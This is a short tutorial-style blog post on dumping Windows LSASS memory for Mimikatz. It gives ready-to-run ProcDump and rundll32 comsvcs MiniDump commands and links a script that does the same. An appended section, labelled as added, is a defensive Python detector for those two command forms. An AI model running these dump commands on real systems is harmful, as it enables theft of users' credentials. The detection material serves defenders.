Tuesday, April 14, 2020

LSASS Dumping Methods (For Mimikatz)


In every attack we need to get the Windows credentials; this is a super important task. We target the "LSASS.EXE" process and dump its memory so that the dump can be used for extracting credentials with Mimikatz.


Here are some of the important methods:

Using ProcDump:

1. The favorite method of dumping is using "procdump.exe". This tool is from Microsoft PsTools.
2. Download ProcDump.exe and upload it to the remote system.
3. Command: "procdump -ma lsass.exe lsass.dmp"


Using VB Script:

Download the script from here:
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp













rundll32 Command:

Essentially, the VBS script from the previous method uses the following command to dump the Lsass.exe process:

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So in case you do not have the VB script with you, you can still fire up the command and dump the LSASS process.
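
From the defender's side, both command lines on this page leave a recognizable process-creation record (for example in Sysmon Event ID 1). The following is an added example, not part of the original post: a Python matcher for the two command forms shown above, run over constructed sample command lines. The function names, regex names and sample lines are assumptions made for the illustration.

```python
import re

# ProcDump form from the page: full-memory flag (-ma) with lsass as the target.
# Matching on arguments keeps the rule independent of the binary's file name.
PROCDUMP_RE = re.compile(
    r'(?:^|\s)[-/]ma\s+(?:\S*\\)?lsass(?:\.exe)?(?:\s+(?P<out>\S+))?', re.I)

# rundll32 form from the page: comsvcs.dll, MiniDump <pid> <path> full.
# The string "lsass" need not appear here; the target is given as a PID,
# so a keyword search for "lsass" alone would miss this form.
COMSVCS_RE = re.compile(
    r'comsvcs(?:\.dll)?\s*,?\s*MiniDump\s+(?P<pid>\d+)\s+(?P<out>\S+)\s+full', re.I)

def classify(cmdline):
    """Return a finding dict for a process command line, or None if no match."""
    m = COMSVCS_RE.search(cmdline)
    if m:
        return {"technique": "comsvcs-minidump", "pid": int(m["pid"]), "out": m["out"]}
    m = PROCDUMP_RE.search(cmdline)
    if m:
        return {"technique": "procdump-lsass", "pid": None, "out": m["out"]}
    return None

# Constructed sample command lines (not real telemetry).
SAMPLES = [
    r'procdump -ma lsass.exe lsass.dmp',
    r'rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full',
    r'rundll32.exe shell32.dll,Control_RunDLL desk.cpl',
    r'procdump -ma notepad.exe notepad.dmp',
]

def scan(lines):
    """Return (command line, finding) pairs for every line that matches."""
    return [(line, f) for line in lines if (f := classify(line))]

if __name__ == "__main__":
    for line, finding in scan(SAMPLES):
        print(finding["technique"], "->", line)
```

For the comsvcs form, the extracted PID should be resolved against the process list from the same host and time window to confirm that it belonged to lsass.exe, and the output path gives responders the dump file to look for.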


















